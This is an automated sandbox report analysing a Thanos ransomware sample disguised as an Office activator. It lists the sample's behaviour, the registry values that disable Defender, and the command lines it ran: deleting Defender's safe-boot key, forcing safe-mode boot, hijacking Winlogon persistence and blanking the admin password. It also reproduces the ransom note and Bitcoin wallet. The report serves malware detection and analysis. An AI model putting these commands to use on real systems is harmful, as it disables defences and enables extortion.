Malware Analysis Report

2024-11-13 15:33

Sample ID 241108-xq3m4awrfw
Target OfficeActivator.exe
SHA256 8441f92e8460a7b2ed37ee96affe547a65589b2e8e980a18a6b08b786b48465d
Tags
thanos defense_evasion evasion persistence ransomware discovery execution impact trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8441f92e8460a7b2ed37ee96affe547a65589b2e8e980a18a6b08b786b48465d

Threat Level: Known bad

The file OfficeActivator.exe was found to be: Known bad.

Malicious Activity Summary

thanos defense_evasion evasion persistence ransomware discovery execution impact trojan

Modifies Windows Defender Real-time Protection settings

Modifies WinLogon for persistence

Thanos executable

Disables service(s)

Contains code to disable Windows Defender

Thanos family

Renames multiple (60) files with added filename extension

Deletes shadow copies

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Impair Defenses: Safe Mode Boot

Drops startup file

Windows security modification

Legitimate hosting services abused for malware hosting/C2

Modifies WinLogon

Enumerates connected drives

Launches sc.exe

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Interacts with shadow copies

Runs ping.exe

Modifies registry key

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 19:04

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Thanos executable

Description Indicator Process Target
N/A N/A N/A N/A

Thanos family

thanos

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 19:04

Reported

2024-11-08 19:04

Platform

win7-20240903-en

Max time kernel

3s

Max time network

4s

Command Line

"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\OfficeActivator.exe,C:\\Windows\\system32\\userinit.exe" C:\Windows\system32\reg.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Impair Defenses: Safe Mode Boot

defense_evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2380 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\bcdedit.exe
PID 2380 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\bcdedit.exe
PID 2380 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\bcdedit.exe
PID 2380 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\net.exe
PID 2380 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\net.exe
PID 2380 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\net.exe
PID 2380 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\shutdown.exe
PID 2380 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\shutdown.exe
PID 2380 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\system32\shutdown.exe
PID 2360 wrote to memory of 2320 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2360 wrote to memory of 2320 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2360 wrote to memory of 2320 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe

"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"

C:\Windows\system32\reg.exe

"reg.exe" delete HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend /f

C:\Windows\system32\bcdedit.exe

"bcdedit.exe" /set {default} safeboot network

C:\Windows\system32\reg.exe

"reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe","C:\Windows\system32\userinit.exe" /f

C:\Windows\system32\net.exe

"net.exe" user Admin ""

C:\Windows\system32\shutdown.exe

"shutdown.exe" /r /t 0

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user Admin ""

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

memory/2380-0-0x000007FEF5BA3000-0x000007FEF5BA4000-memory.dmp

memory/2380-1-0x00000000002B0000-0x00000000002CA000-memory.dmp

memory/2380-2-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

memory/2380-3-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

memory/2756-4-0x0000000002D90000-0x0000000002D91000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 19:04

Reported

2024-11-08 19:06

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Disables service(s)

evasion execution

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (60) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\SYSTEM32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SYSTEM32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A
N/A N/A C:\Windows\SYSTEM32\sc.exe N/A

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1524 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1524 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1524 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
